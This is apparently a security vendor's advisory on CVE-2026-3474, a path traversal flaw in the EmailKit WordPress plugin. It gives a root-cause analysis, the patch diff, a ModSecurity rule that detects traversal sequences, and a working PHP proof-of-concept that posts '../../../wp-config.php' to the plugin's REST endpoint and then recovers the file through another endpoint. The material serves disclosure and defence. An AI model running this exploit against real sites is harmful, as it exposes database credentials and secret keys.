What is CVE-2026-3474?

CVE-2026-3474 is a medium severity authenticated path traversal vulnerability found in the EmailKit plugin for WordPress, affecting versions up to and including 1.6.3. It allows authenticated users with Administrator-level access to read arbitrary files on the server by exploiting the ’emailkit-editor-template’ REST API parameter.

How does the vulnerability work?

The vulnerability occurs because the EmailKit plugin directly uses user-supplied input from the ’emailkit-editor-template’ parameter in file_get_contents() without proper validation. An attacker can craft a request that includes a traversal sequence, allowing them to access sensitive files like wp-config.php.

Who is affected by this vulnerability?

Any WordPress site using the EmailKit plugin version 1.6.3 or earlier is potentially affected. Only authenticated users with Administrator privileges can exploit this vulnerability, making it critical for sites with such users.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the EmailKit plugin installed. If it is version 1.6.3 or earlier, your site is at risk. Additionally, review your site’s user roles to see if any users have Administrator access.

How can I fix this vulnerability?

The vulnerability is fixed in version 1.6.4 of the EmailKit plugin. It is essential to update the plugin to this patched version immediately to mitigate the risk of exploitation.

What does the CVSS score of 4.9 mean?

A CVSS score of 4.9 indicates a medium severity vulnerability. This means that while the vulnerability is not the highest risk, it still poses a significant threat, especially in the hands of an authenticated attacker.

What types of files can be accessed through this vulnerability?

Exploitation of this vulnerability can lead to the exposure of sensitive files such as wp-config.php, which contains database credentials, and system files like /etc/passwd. This data can be used for further attacks or site compromise.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a crafted POST request to the vulnerable REST API endpoint with a path traversal payload. This demonstrates how an authenticated attacker can read sensitive files by manipulating the ’emailkit-editor-template’ parameter.

What are the consequences of successful exploitation?

Successful exploitation can lead to full server file disclosure, allowing attackers to read sensitive configuration files and potentially gain access to the site’s database and other critical information, which can facilitate further attacks.

Is there a way to mitigate this vulnerability if I cannot update immediately?

If immediate updating is not possible, consider restricting access to the REST API or limiting Administrator access until the plugin can be updated. Additionally, monitor server logs for any suspicious activity related to file access.

How does the patch in version 1.6.4 address the vulnerability?

The patch in version 1.6.4 introduces proper path validation by using realpath() and checks that the resolved path starts with an allowed base directory. This prevents unauthorized file access by ensuring only files within the designated template directory can be read.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change all passwords, review user accounts for unauthorized access, and check server logs for unusual activity. Consider restoring from a clean backup and conducting a thorough security audit.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 29, 2026

CVE-2026-3474: EmailKit <= 1.6.3 – Authenticated (Administrator+) Path Traversal via 'emailkit-editor-template' REST API Parameter (emailkit)

CVE ID CVE-2026-3474

Plugin emailkit

Severity Medium (CVSS 4.9)

CWE 22

Vulnerable Version 1.6.3

Patched Version 1.6.4

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3474:
The EmailKit WordPress plugin, versions up to and including 1.6.3, contains an authenticated path traversal vulnerability. This flaw allows attackers with administrator-level access to read arbitrary files from the server via the plugin’s REST API. The vulnerability stems from improper input validation in a core template handling function.

Atomic Edge research identifies the root cause within the `action()` function of the `TemplateData` class, located in `/emailkit/includes/Admin/Api/TemplateData.php`. The vulnerable code passes the user-controlled `emailkit-editor-template` REST API parameter directly to `file_get_contents()` without validation. The function reads two files: the parameter value itself and a derived HTML file path created by replacing ‘content.json’ with ‘content.html’. This direct usage of unsanitized input for file operations creates the path traversal condition.

Exploitation requires an authenticated administrator to send a crafted POST request to the vulnerable REST API endpoint. The attacker supplies a traversal sequence, such as `../../../wp-config.php`, within the `emailkit-editor-template` parameter. The plugin reads the specified file and stores its contents as post meta data. An attacker can then retrieve the stolen file contents via the plugin’s `fetch-data` REST API endpoint, completing the arbitrary file read attack.

The patch in version 1.6.4 introduces a multi-layered defense. It defines an `$allowed_base_path` as the plugin’s template directory within the WordPress uploads folder. The code resolves the user-supplied path using `realpath()` and validates that the resulting absolute path starts with the allowed base directory using `strpos()`. This validation occurs for both the JSON and HTML file paths. If the path validation fails, the function returns a ‘fail’ status, preventing file access. This fix mirrors the secure pattern already implemented in the plugin’s `CheckForm` class.

Successful exploitation leads to full server file disclosure. Attackers can read sensitive configuration files like `wp-config.php` containing database credentials and secret keys. They can also read system files such as `/etc/passwd` or application source code. This data exposure can facilitate further attacks, including full site compromise and potential lateral movement within the hosting environment.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/emailkit/EmailKit.php
+++ b/emailkit/EmailKit.php
@@ -6,7 +6,7 @@
  * Description: EmailKit is the most-complete drag-and-drop Email template builder.
  * Author: wpmet
  * Author URI: https://wpmet.com
- * Version: 1.6.3
+ * Version: 1.6.4
  * Text Domain: emailkit
  * License:  GPLv3
  * License URI: https://www.gnu.org/licenses/gpl-3.0.txt
@@ -68,7 +68,7 @@
      */
     public function define_constants()
     {
-        define('EMAILKIT_VERSION', '1.6.3');
+        define('EMAILKIT_VERSION', '1.6.4');
         define('EMAILKIT_TEXTDOMAIN', 'emailkit');
         define('EMAILKIT_FILE', __FILE__);
         define('EMAILKIT_PATH', __DIR__);
--- a/emailkit/includes/Admin/Api/TemplateData.php
+++ b/emailkit/includes/Admin/Api/TemplateData.php
@@ -45,9 +45,26 @@



-        if(!empty($request->get_param( 'emailkit-editor-template' ) && trim($request->get_param( 'emailkit-editor-template' )) !== '')){
-            $template = file_get_contents($request->get_param( 'emailkit-editor-template' ))??'';
-            $html = file_get_contents(str_replace( "content.json", "content.html", $request->get_param( 'emailkit-editor-template' )))??'';
+        if (!empty($request->get_param('emailkit-editor-template')) && trim($request->get_param('emailkit-editor-template')) !== '') {
+            $template_path = $request->get_param('emailkit-editor-template');
+            $allowed_base_path = wp_upload_dir()['basedir'] . '/emailkit/templates/';
+            $real_path = realpath($template_path);
+            if ($real_path === false || strpos($real_path, realpath($allowed_base_path)) !== 0) {
+                return [
+                    'status'    => 'fail',
+                    'message'   => [__('Invalid template path', 'emailkit')]
+                ];
+            }
+
+            $template = file_exists($real_path) ? file_get_contents($real_path) : '';
+            $html_path = str_replace("content.json", "content.html", $real_path);
+
+            // Validate HTML path as well
+            $real_html_path = realpath($html_path);
+            if ($real_html_path !== false && strpos($real_html_path, realpath($allowed_base_path)) === 0) {
+
+                $html = file_exists($real_html_path) ? file_get_contents($real_html_path) : '';
+            }
         }

         $subject = !empty($request->get_param( 'emailkit_template_title' ))? trim($request->get_param( 'emailkit_template_title' )) : null;

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3474
SecRule REQUEST_URI "@rx ^/wp-json/emailkit/vd+/template-data" 
  "id:10003474,phase:2,deny,status:403,chain,msg:'CVE-2026-3474 Path Traversal via EmailKit REST API',severity:'CRITICAL',tag:'CVE-2026-3474',tag:'WordPress',tag:'EmailKit',tag:'Path-Traversal'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_BODY "@rx emailkit-editor-template.*?(?:\.\./|%2e%2e%2f|%252e%252e%252f)" 
      "t:none,t:urlDecodeUni,t:lowercase,t:normalizePathWin"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3474 - EmailKit <= 1.6.3 - Authenticated (Administrator+) Path Traversal via 'emailkit-editor-template' REST API Parameter

<?php

$target_url = 'https://example.com/wp-json/emailkit/v1/template-data';
$admin_cookie = 'wordpress_logged_in_abc123=...'; // Valid administrator session cookie
$file_to_read = '../../../wp-config.php'; // Path traversal payload

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Cookie: ' . $admin_cookie
]);

// Craft JSON payload with the traversal path in the vulnerable parameter
$payload = json_encode([
    'emailkit-editor-template' => $file_to_read,
    'emailkit_template_title' => 'Exploit Template'
]);

curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    $data = json_decode($response, true);
    if (isset($data['status']) && $data['status'] === 'success') {
        echo "[+] File read request successful.n";
        echo "[+] The file contents have been stored as post meta.n";
        echo "[+] Use the plugin's fetch-data endpoint to retrieve the stolen data.n";
    } else {
        echo "[-] Request succeeded but plugin returned an error.n";
        print_r($data);
    }
} else {
    echo "[-] HTTP request failed with code: " . $http_code . "n";
    echo "Response: " . $response . "n";
}

?>

Frequently Asked Questions

What is CVE-2026-3474?
Overview of the vulnerability
CVE-2026-3474 is a medium severity authenticated path traversal vulnerability found in the EmailKit plugin for WordPress, affecting versions up to and including 1.6.3. It allows authenticated users with Administrator-level access to read arbitrary files on the server by exploiting the ’emailkit-editor-template’ REST API parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs because the EmailKit plugin directly uses user-supplied input from the ’emailkit-editor-template’ parameter in file_get_contents() without proper validation. An attacker can craft a request that includes a traversal sequence, allowing them to access sensitive files like wp-config.php.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the EmailKit plugin version 1.6.3 or earlier is potentially affected. Only authenticated users with Administrator privileges can exploit this vulnerability, making it critical for sites with such users.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the EmailKit plugin installed. If it is version 1.6.3 or earlier, your site is at risk. Additionally, review your site’s user roles to see if any users have Administrator access.
How can I fix this vulnerability?
Recommended actions
The vulnerability is fixed in version 1.6.4 of the EmailKit plugin. It is essential to update the plugin to this patched version immediately to mitigate the risk of exploitation.
What does the CVSS score of 4.9 mean?
Understanding risk levels
A CVSS score of 4.9 indicates a medium severity vulnerability. This means that while the vulnerability is not the highest risk, it still poses a significant threat, especially in the hands of an authenticated attacker.
What types of files can be accessed through this vulnerability?
Potential data exposure
Exploitation of this vulnerability can lead to the exposure of sensitive files such as wp-config.php, which contains database credentials, and system files like /etc/passwd. This data can be used for further attacks or site compromise.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept involves sending a crafted POST request to the vulnerable REST API endpoint with a path traversal payload. This demonstrates how an authenticated attacker can read sensitive files by manipulating the ’emailkit-editor-template’ parameter.
What are the consequences of successful exploitation?
Impact on the affected site
Successful exploitation can lead to full server file disclosure, allowing attackers to read sensitive configuration files and potentially gain access to the site’s database and other critical information, which can facilitate further attacks.
Is there a way to mitigate this vulnerability if I cannot update immediately?
Temporary protective measures
If immediate updating is not possible, consider restricting access to the REST API or limiting Administrator access until the plugin can be updated. Additionally, monitor server logs for any suspicious activity related to file access.
How does the patch in version 1.6.4 address the vulnerability?
Details of the fix
The patch in version 1.6.4 introduces proper path validation by using realpath() and checks that the resolved path starts with an allowed base directory. This prevents unauthorized file access by ensuring only files within the designated template directory can be read.
What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect your site has been compromised, immediately change all passwords, review user accounts for unauthorized access, and check server logs for unusual activity. Consider restoring from a clean backup and conducting a thorough security audit.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations